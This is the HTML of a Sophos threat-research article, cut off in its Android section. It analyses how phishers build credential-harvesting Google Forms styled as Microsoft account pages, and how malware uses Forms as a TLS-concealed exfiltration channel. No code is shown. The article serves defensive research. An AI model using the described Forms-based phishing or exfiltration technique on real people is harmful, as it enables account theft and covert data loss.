<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://news.sophos.com/xmlrpc.php">
	<link rel="alternate" hreflang="es-419" href="https://news.sophos.com/es-419/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="nl-nl" href="https://news.sophos.com/nl-nl/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="pt-br" href="https://news.sophos.com/pt-br/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="de-de" href="https://news.sophos.com/de-de/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="en-us" href="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="fr-fr" href="https://news.sophos.com/fr-fr/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="es-es" href="https://news.sophos.com/es-es/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="it-it" href="https://news.sophos.com/it-it/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="ja-jp" href="https://news.sophos.com/ja-jp/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
	<link rel="alternate" hreflang="zh-tw" href="https://news.sophos.com/zh-tw/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration" />
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl+ '&gtm_auth=d5XceCG5H_eblswmMfURjQ&gtm_preview=env-2&gtm_cookies_win=x';f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-5L6H3LN');</script>
<!-- End Google Tag Manager -->
<title>Phishing and malware actors abuse Google Forms for credentials, data exfiltration &#8211; Sophos News</title>
<meta name='robots' content='max-image-preview:large' />
<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="8r1qg681OjOolfxmHEY1IYupmTBdyKXc-OPfpgeQHFk" />
<link rel='dns-prefetch' href='//cdn.jsdelivr.net' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; Feed" href="https://news.sophos.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; Comments Feed" href="https://news.sophos.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Sophos News &raquo; Phishing and malware actors abuse Google Forms for credentials, data exfiltration Comments Feed" href="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/news.sophos.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.1"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='all-css-0' href='https://news.sophos.com/_static/??-eJyNj80SgjAMhF/IkrYqnByfpZQMVNOfIWWYvr1FPcB48ZbN7jfJwpqEC5aWARksMwyOM/QU7VOQ62czF+BcCBvvQlMDJ9gTDwaPgzNI6DHkg0hkCs6CcDS2/IdXb68PkI0hb5k8VY+BY5oiB1xZaKm6z5N11OqH8ItItIwu1IOYk6nVlGzUu+53sTF3f1PtWV+UvHbtC57DZbM=' type='text/css' media='all' />
<style id='wp-block-library-inline-css'>
.has-text-align-justify{text-align:justify;}
</style>
<script type='text/javascript' src='https://news.sophos.com/_static/??-eJzTLy/QzcxLzilNSS3WzwKiwtLUokoopZebmaeXVayjj0+Rbm5melFiSSpUsX2uraGZsZGRqbG5uVEWAK9bIh4='></script>
<link rel="https://api.w.org/" href="https://news.sophos.com/wp-json/" /><link rel="alternate" type="application/json" href="https://news.sophos.com/wp-json/wp/v2/posts/78023" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://news.sophos.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://news.sophos.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.8.1" />
<link rel="canonical" href="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/" />
<link rel='shortlink' href='https://news.sophos.com/?p=78023' />
<link rel="alternate" type="application/json+oembed" href="https://news.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnews.sophos.com%2Fen-us%2F2021%2F09%2F23%2Fphishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://news.sophos.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnews.sophos.com%2Fen-us%2F2021%2F09%2F23%2Fphishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>
		<link rel="amphtml" href="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/amp/">
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Phishing and malware actors abuse Google Forms for credentials, data exfiltration" />
<meta property="og:url" content="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/" />
<meta property="og:description" content="Earlier this year as we researched malware use of Transport Layer Security-based communications to conceal command and control traffic and downloads, we found a disproportionate amount of traffic g…" />
<meta property="article:published_time" content="2021-09-23T12:30:05+00:00" />
<meta property="article:modified_time" content="2021-09-23T17:31:36+00:00" />
<meta property="og:site_name" content="Sophos News" />
<meta property="og:image" content="https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?w=640" />
<meta property="og:image:secure_url" content="https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?w=640" />
<meta property="og:image:width" content="640" />
<meta property="og:image:height" content="306" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="Phishing and malware actors abuse Google Forms for credentials, data exfiltration" />
<meta name="twitter:image" content="https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="fb:admins" content="28552295016" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=32" sizes="32x32" />
<link rel="icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=180" />
<meta name="msapplication-TileImage" content="https://news.sophos.com/wp-content/uploads/2020/01/cropped-sophos.png?w=270" />
</head>

<body class="post-template-default single single-post postid-78023 single-format-standard group-blog">
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5L6H3LN&gtm_auth=d5XceCG5H_eblswmMfURjQ&gtm_preview=env-2&gtm_cookies_win=x"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<div id="page" class="hfeed site">
	<a class="sr-only" href="#content">Skip to content</a>

	
<header class="bg-blue-600" x-data="{ mobileMenu: false, searchField: false }">
	<div class="container">
		<div class="flex items-center justify-between h-16">

			<!-- Logo -->
			<div class="flex-shrink-0">
				<a class="site-logo" href="https://news.sophos.com/en-us/" rel="home">
				<svg width="172" height="17" xmlns="http://www.w3.org/2000/svg">
					<g fill="#FFF" fill-rule="evenodd">
						<path d="M113.024 5.298V16.74h-2.595V.259h2.265l7.997 11.49V.26h2.619v16.482h-2.289l-7.997-11.443M126.064.259h10.78v2.307H128.8v4.521h7.549v2.214h-7.55v5.133h8.376v2.307h-11.111V.259M138.478.259h2.855l2.694 12.29L147.29.26h2.783l3.61 12.314L156.005.26h2.783l-3.62 16.482h-2.76l-3.751-12.126-3.426 12.126h-2.784L138.478.259M168.933 4.968v-.283c0-1.318-.778-2.425-3.492-2.425-2.43 0-3.279 1.013-3.279 2.284 0 1.201.708 1.743 2.218 2.073l3.491.776c2.123.448 4.129 1.602 4.129 4.333 0 3.014-1.675 5.274-6.204 5.274-5.214 0-6.559-2.26-6.559-4.52v-.307h2.737v.26c0 1.2.755 2.284 3.774 2.284 2.5 0 3.421-1.084 3.421-2.638 0-1.224-.731-1.907-2.289-2.237l-3.49-.777c-2.407-.517-3.917-1.742-3.917-4.309 0-2.566 1.77-4.756 6.016-4.756 4.553 0 6.18 2.26 6.18 4.639v.33h-2.736M85.303 16.718h8.88c2.492 0 3.549-.15 4.379-.677 1.308-.803 2.139-2.378 2.139-4.162 0-1.457-.504-2.868-1.258-3.622-.981-1.006-2.316-1.382-4.783-1.382h-2.693c-1.208 0-2.097-.05-2.6-.276-.605-.277-.956-.81-.956-1.562 0-.88.427-1.455 1.132-1.632.529-.124 1.14-.124 2.726-.15h7.949V.265h-8.754c-1.963 0-2.843.075-3.598.353-1.737.602-2.921 2.383-2.921 4.518 0 1.458.58 2.745 1.587 3.624.881.753 2.189 1.105 4.202 1.105h3.584c.805 0 1.46.1 1.813.3.678.327 1.08.934 1.08 1.714 0 .652-.301 1.122-.83 1.447-.426.278-1.158.403-2.49.403h-8.588v2.99zm-84.945 0h8.88c2.492 0 3.549-.15 4.38-.677 1.307-.803 2.138-2.378 2.138-4.162 0-1.457-.504-2.868-1.258-3.622-.982-1.006-2.316-1.382-4.783-1.382H7.023c-1.209 0-2.098-.05-2.6-.276-.605-.277-.957-.81-.957-1.562 0-.88.427-1.455 1.132-1.632.53-.124 1.141-.124 2.726-.15h7.95V.265H6.52c-1.964 0-2.844.075-3.6.353C1.185 1.22 0 3 0 5.136 0 6.594.582 7.881 1.587 8.76c.881.753 2.19 1.105 4.203 1.105h3.582c.807 0 1.46.1 1.814.3.678.327 1.08.934 1.08 1.714 0 .652-.3 1.122-.83 1.447-.426.278-1.157.403-2.49.403H.358v2.99zM71.99 4.596c-.52.813-.765 2.118-.765 3.87 0 3.845 1.331 5.595 4.294 5.595 2.915 0 4.248-1.75 4.248-5.546 0-3.847-1.308-5.571-4.248-5.571-1.604 0-2.864.592-3.53 1.652zm10.05-1.897c1.013 1.33 1.58 3.498 1.58 6.039 0 2.882-.914 5.249-2.544 6.555-1.233.986-3.11 1.528-5.335 1.528-3.16 0-5.654-1.037-6.937-2.884-.964-1.355-1.435-3.155-1.435-5.35 0-3.152.866-5.544 2.495-6.826C71.149.726 73.175.158 75.497.158c2.938 0 5.284.913 6.543 2.54zM65.36.279h-3.507v6.73h-6.345V.278h-3.507v16.439h3.507V9.94h6.345v6.778h3.506V.278zM43.533 8.042c.938 0 1.48-.123 1.852-.469.442-.37.715-1.158.715-2.07 0-1.084-.443-1.872-1.208-2.144-.272-.1-.717-.149-1.286-.149h-4.839v4.832h4.766zm-4.766 8.674h-3.507V.278h8.223c2.889 0 3.902.295 4.988 1.504.964 1.036 1.481 2.39 1.481 3.845 0 1.725-.69 3.327-1.826 4.289-.962.813-1.854 1.058-3.728 1.058h-5.63v5.743zM21.665 4.596c-.519.813-.764 2.118-.764 3.87 0 3.845 1.333 5.595 4.297 5.595 2.913 0 4.247-1.75 4.247-5.546 0-3.847-1.308-5.571-4.247-5.571-1.606 0-2.866.592-3.533 1.652zm10.052-1.897c1.014 1.33 1.581 3.498 1.581 6.039 0 2.882-.914 5.249-2.545 6.555-1.233.986-3.11 1.528-5.333 1.528-3.162 0-5.656-1.037-6.94-2.884-.964-1.355-1.432-3.155-1.432-5.35 0-3.152.865-5.544 2.496-6.826C20.825.726 22.85.158 25.173.158c2.938 0 5.286.913 6.544 2.54z"/>
					</g>
				</svg>
				</a>
			</div>

			<!-- Search Field -->
			<div class="lg:flex justify-end flex-grow hidden" x-show="searchField" x-cloak>
				<div class="relative w-1/2 rounded-md shadow-sm">
					<form role="search" method="get" action="https://news.sophos.com/en-us/">
						<input
							type="text"
							class="block w-full text-lg text-white placeholder-gray-100 bg-blue-800 border-0 rounded-md font-sansMedium font-medium"
							placeholder="Type to Search News"
							x-ref="searchInput"
							name="s"
						/>
						<div class="absolute inset-y-0 right-0 flex items-center px-3">
							<button
								class="hover:opacity-100 opacity-60 p-1 text-xs text-white uppercase rounded-full cursor-pointer"
								type="submit"
							>
								Search							</button>
						</div>
					</form>
				</div>
			</div>

			<!-- Main Nav -->
			<div class="lg:flex items-center flex-grow hidden" x-show="!searchField" x-cloak>
				<div class="flex ml-auto">
				<ul id="menu-en-us-primary" class="primary-menu"><li id="menu-item-77773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77773"><a href="https://news.sophos.com/en-us/category/products-services/">Products &amp; Services<div class="menu-item-description"></div></a></li>
<li id="menu-item-77772" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77772"><a href="https://news.sophos.com/en-us/category/security-operations/">Security Operations<div class="menu-item-description"></div></a></li>
<li id="menu-item-77774" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-77774"><a href="https://news.sophos.com/en-us/category/threat-research/">Threat Research<div class="menu-item-description"></div></a></li>
<li id="menu-item-77775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77775"><a href="https://ai.sophos.com">AI Research<div class="menu-item-description"></div></a></li>
<li id="menu-item-77776" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77776"><a href="https://nakedsecurity.sophos.com">Security News &#038; Tips<div class="menu-item-description"></div></a></li>
</ul>				</div>
			</div>

			<!-- Search button -->
			<div class="lg:block hidden ml-4">
				<div class="flex items-center">
					<button
					class="border-2 border-transparent hover:border-white inline-flex items-center justify-center p-2 text-white rounded-md focus:outline-none transition-colors"
					@click.prevent="searchField = !searchField; $nextTick(() => { setTimeout(() => { $refs.searchInput.focus(); }, 150);});"
					>
						<span class="sr-only">Search</span>
						<!-- Heroicon name: outline/bell -->
						<svg
							class="w-5 h-5"
							xmlns="http://www.w3.org/2000/svg"
							fill="none"
							viewBox="0 0 24 24"
							stroke="currentColor"
							:class="{ 'block': !searchField, 'hidden': searchField }"
						>
							<path
							stroke-linecap="round"
							stroke-linejoin="round"
							stroke-width="3"
							d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"
							/>
						</svg>
						<svg
							class="hidden w-5 h-5"
							xmlns="http://www.w3.org/2000/svg"
							fill="none"
							viewBox="0 0 24 24"
							stroke="currentColor"
							aria-hidden="true"
							:class="{ 'block': searchField, 'hidden': !searchField }"
						>
							<path
							stroke-linecap="round"
							stroke-linejoin="round"
							stroke-width="3"
							d="M6 18L18 6M6 6l12 12"
							/>
						</svg>
					</button>
				</div>
			</div>

			<!-- Mobile menu button -->
			<div class="lg:hidden flex -mr-2">
				<button
					type="button"
					class="hover:text-white hover:bg-blue-800 focus:outline-none hover:ring-2 focus:ring-offset-2 focus:ring-offset-gray-300 focus:ring-white inline-flex items-center justify-center p-2 text-white rounded-md"
					aria-controls="mobile-menu"
					aria-expanded="false"
					@click="mobileMenu = !mobileMenu"
				>
					<span class="sr-only">Open main menu</span>
					<!--
						Heroicon name: outline/menu

						Menu open: "hidden", Menu closed: "block"
					-->
					<svg
					class="block w-6 h-6"
					xmlns="http://www.w3.org/2000/svg"
					fill="none"
					viewBox="0 0 24 24"
					stroke="currentColor"
					:class="{ 'block': !mobileMenu, 'hidden': mobileMenu }"
					>
					<path
						stroke-linecap="round"
						stroke-linejoin="round"
						stroke-width="3"
						d="M4 6h16M4 12h16m-7 6h7"
					/>
					</svg>
					<!--
						Heroicon name: outline/x

						Menu open: "block", Menu closed: "hidden"
					-->
					<svg
					class="hidden w-6 h-6"
					xmlns="http://www.w3.org/2000/svg"
					fill="none"
					viewBox="0 0 24 24"
					stroke="currentColor"
					aria-hidden="true"
					:class="{ 'block': mobileMenu, 'hidden': !mobileMenu }"
					>
					<path
						stroke-linecap="round"
						stroke-linejoin="round"
						stroke-width="3"
						d="M6 18L18 6M6 6l12 12"
					/>
					</svg>
				</button>
			</div>
		</div>
	</div>

	<!-- Mobile menu, show/hide based on menu state. -->
	<div
	class="lg:hidden container"
	x-show="mobileMenu"
	x-cloak
	x-transition:enter="transition-all ease-out duration-100"
	x-transition:enter-start="transform opacity-0 scale-95"
	x-transition:enter-end="transform opacity-100 scale-100"
	x-transition:leave="transition ease-in duration-75"
	x-transition:leave-start="transform opacity-100 scale-100"
	x-transition:leave-end="transform opacity-0 scale-95"
	>
		<div class="pt-2 pb-8 space-y-2">
			<div class="relative rounded-md shadow-sm">
				<form role="search" method="get" action="https://news.sophos.com/en-us/">
					<input
						type="text"
						class="focus:ring-blue-600 focus:border-blue-600 sm:text-sm block w-full placeholder-gray-600 border-gray-300 rounded-md"
						placeholder="Search News"
						name="s"
					/>
					<div
						class="absolute inset-y-0 right-0 flex items-center px-3 pointer-events-none"
					>
						<button class="p-1 text-gray-500 rounded-full" type="submit">
							<span class="sr-only">Search</span>
							<!-- Heroicon name: outline/bell -->
							<svg
								class="w-4 h-4"
								xmlns="http://www.w3.org/2000/svg"
								fill="none"
								viewBox="0 0 24 24"
								stroke="currentColor"
							>
								<path
									stroke-linecap="round"
									stroke-linejoin="round"
									stroke-width="3"
									d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z"
								/>
							</svg>
						</button>
					</div>
				</form>
			</div>

			<ul id="menu-en-us-primary-1" class="mobile-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77773"><a href="https://news.sophos.com/en-us/category/products-services/">Products &amp; Services<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-77772"><a href="https://news.sophos.com/en-us/category/security-operations/">Security Operations<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-77774"><a href="https://news.sophos.com/en-us/category/threat-research/">Threat Research<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77775"><a href="https://ai.sophos.com">AI Research<div class="menu-item-description"></div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77776"><a href="https://nakedsecurity.sophos.com">Security News &#038; Tips<div class="menu-item-description"></div></a></li>
</ul>		</div>
	</div>
</header>

	<div id="content">

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-78023" class="post-78023 post type-post status-publish format-standard has-post-thumbnail hentry category-sophoslabs-uncut category-threat-research tag-exfiltration tag-featured tag-google-forms tag-legitimate-service-abuse tag-phishing tag-tls region-en-us">

		<div class="container mt-8 md:mt-16">
		<div class="max-w-5xl mx-auto relative">
				<div
						class="aspect-w-16 aspect-h-9 flex bg-gray-400 bg-right bg-no-repeat bg-cover"
				>
					<img width="816" height="390" src="https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?w=816" class="object-cover wp-post-image" alt="" loading="lazy" srcset="https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png 816w, https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?resize=300,143 300w, https://news.sophos.com/wp-content/uploads/2021/09/pocketphisherman.png?resize=768,367 768w" sizes="(max-width: 816px) 100vw, 816px" />				</div>
								<div
						class="left-8 w-28 h-28 lg:left-12 xl:left-16 lg:w-40 lg:h-40 place-items-center absolute top-0 grid"
				>
					<img
							src="https://news.sophos.com/wp-content/uploads/2021/05/Category-Icon-Threat-Research@2x.min_.png"
							alt="SophosLabs Uncut"
					/>
									</div>
						</div>
	</div>


			
	<header>
		<div class="container mt-8 md:mt-16 md:-mb-4">
			<div class="max-w-4xl mx-auto">

				<h1 class="text-style-h1 mb-8">Phishing and malware actors abuse Google Forms for credentials, data exfiltration</h1>
				<div class="text-xl md:text-2xl -mt-2">
					<span class="byline">
		Written by 				<span class="author vcard">
				<a href="https://news.sophos.com/en-us/author/sean-gallagher/" title="Posts by Sean Gallagher" class="author url fn" rel="author">Sean Gallagher</a>				</span>
								</span>
						</div>

				<div class="text-sophos-gray-600 mt-4 text-xs font-sansSemiBold font-semibold leading-tight uppercase">
					<span class="posted-on"><a href="https://news.sophos.com/en-us/2021/09/23/phishing-and-malware-actors-abuse-google-forms-for-credentials-data-exfiltration/" rel="bookmark">23 September 2021</a></span>				</div>

				<div class="mt-6 space-y-2 space-x-1">
					<a href="https://news.sophos.com/en-us/category/threat-research/sophoslabs-uncut/" class="category-tag-pill">SophosLabs Uncut</a> <a href="https://news.sophos.com/en-us/category/threat-research/" class="category-tag-pill">Threat Research</a> <a href="https://news.sophos.com/en-us/tag/exfiltration/" class="category-tag-pill">exfiltration</a> <a href="https://news.sophos.com/en-us/tag/featured/" class="category-tag-pill">featured</a> <a href="https://news.sophos.com/en-us/tag/google-forms/" class="category-tag-pill">Google Forms</a> <a href="https://news.sophos.com/en-us/tag/legitimate-service-abuse/" class="category-tag-pill">legitimate service abuse</a> <a href="https://news.sophos.com/en-us/tag/phishing/" class="category-tag-pill">Phishing</a> <a href="https://news.sophos.com/en-us/tag/tls/" class="category-tag-pill">TLS</a>				</div>
			</div>
		</div>
	</header><!-- .entry-header -->

	<div class="container md:my-16 xl:my-24 my-8">
	<div class="entry-content lg:prose-lg mx-auto prose max-w-4xl">
		<p>Earlier this year as we researched <a href="https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/">malware use of Transport Layer Security-based communications</a> to conceal command and control traffic and downloads, we found a disproportionate amount of traffic going to Google cloud services. Among the destinations we found in telemetry were a host of Google Forms pages.</p>
<p>The abuse of legitimate public cloud services by malware is nothing new. We&#8217;ve seen malware use Google Docs and Google Sheets as part of their infection chain and command and control systems in the past, much in the same way they make use of services like GitHub, Pastebin, Telegram and Discord. In each case, malicious actors use the web-based interfaces of the service to either retrieve stored binaries, retrieve specific data that affects their performance, report results of execution or exfiltrate data from infected systems. Since Google Forms are protected by TLS, the contents of data submitted to forms can&#8217;t be checked without the use of a web proxy, and the traffic otherwise looks like legitimate communications to a Google application.</p>
<p>Google Forms abuse comes in a variety of forms. In some cases, Google Forms were used in rudimentary phishing attacks, attempting to convince victims to enter their credentials into a form designed to look somewhat like a login page (despite Google Forms&#8217; text on every form warning users not to enter passwords into them). Often these forms were tied to malicious spam campaigns.</p>
<p>We also uncovered a number of malicious Android applications that made use of Google Forms for user interface elements (though not for malicious purposes). And then there were a few examples of malicious Windows applications that used web requests to Google Forms pages to exfiltrate data from computers. For the purposes of demonstration, we reproduced the exfiltration capability in a Python script using crafted web requests to push system data to a Google spreadsheet through Forms for aggregation.</p>
<h3>Teaching a crook to phish</h3>
<p>Most sophisticated web phishing attacks use HTML that closely mimics the design of the sites of the services they target. But entry-level scammers can and do use Google Forms&#8217; ready-made design templates to attempt to steal payment data through faked &#8220;secure&#8221; e-commerce pages, or create phishing forms that are believable if not examined too closely.</p>
<p>One of the largest sources of Google Forms links in spam were &#8220;unsubscribe&#8221; links in scam marketing emails. But Sophos has intercepted a number of spam-based phishing campaigns that targeted Microsoft online accounts, including Office 365, with the barest of efforts. The spam claimed that recipients&#8217; email accounts were about to be shut down if they were not immediately verified, and offered a link to perform that verification—a Google Forms link, leading to a form decorated with Microsoft graphics but still clearly a Google Form.</p>
<p>This email targeted Outlook.com and Hotmail users:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png"><img loading="lazy" class="alignnone wp-image-78266 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png" alt="" width="1220" height="575" srcset="https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png 1220w, https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png?resize=300,141 300w, https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png?resize=768,362 768w, https://news.sophos.com/wp-content/uploads/2021/09/googleformspam-microsoft-account.png?resize=1024,483 1024w" sizes="(max-width: 1220px) 100vw, 1220px" /></a></p>
<p>Clicking on the &#8220;update now&#8221; link leads to this Google Form:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/googleform-microsoft-account-2-1.png"><img loading="lazy" class="alignnone wp-image-78334 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/googleform-microsoft-account-2-1.png" alt="" width="733" height="826" srcset="https://news.sophos.com/wp-content/uploads/2021/09/googleform-microsoft-account-2-1.png 733w, https://news.sophos.com/wp-content/uploads/2021/09/googleform-microsoft-account-2-1.png?resize=266,300 266w" sizes="(max-width: 733px) 100vw, 733px" /></a></p>
<p>A similar recent spam campaign targets Office 365 users with a very bare-bones lure:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/GOOG-OFFICE-PHISH.png"><img loading="lazy" class="alignnone wp-image-78268 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/GOOG-OFFICE-PHISH.png" alt="" width="1006" height="341" srcset="https://news.sophos.com/wp-content/uploads/2021/09/GOOG-OFFICE-PHISH.png 1006w, https://news.sophos.com/wp-content/uploads/2021/09/GOOG-OFFICE-PHISH.png?resize=300,102 300w, https://news.sophos.com/wp-content/uploads/2021/09/GOOG-OFFICE-PHISH.png?resize=768,260 768w" sizes="(max-width: 1006px) 100vw, 1006px" /></a></p>
<p>The phishing page behind the link is similarly bare-bones:</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2021/09/GOOGLE365-2.png"><img loading="lazy" class="alignnone wp-image-78335 size-full" src="https://news.sophos.com/wp-content/uploads/2021/09/GOOGLE365-2.png" alt="" width="692" height="889" srcset="https://news.sophos.com/wp-content/uploads/2021/09/GOOGLE365-2.png 692w, https://news.sophos.com/wp-content/uploads/2021/09/GOOGLE365-2.png?resize=234,300 234w" sizes="(max-width: 692px) 100vw, 692px" /></a></p>
<p>In both cases, any data entered into these forms gets stored in a Google Sheets document, ready for export by the  phishing campaign operator.  Because the links are to docs.google.com/forms—and they say &#8220;Google Forms&#8221; at the bottom, as well as warning &#8220;Never submit passwords through Google Forms&#8221;—they are easily distinguished as scams. Still, they apparently work frequently enough to warrant their continued use by scammers stealing business and personal email accounts.</p>
<h3>Malware and potentially unwanted apps</h3>
<p>A number of likely malicious Android application packages were uncovered in our research that use Google Forms as a way to capture data without having to code a back-end website. Most of these were potentially unwanted apps or apps that used components associated with Android adware, and they used Google Forms largely as part of their user-facing functionality. For instance, <a href="https://news.sophos.com/en-us/2019/02/26/special-report-sophisticated-ad-fraud-permeates-the-mobile-app-ecosystem/">SnapTube</a>, a video app that monetizes itself for its developer through web advertising fraud, includes a Google Forms page for user feedback:<br />
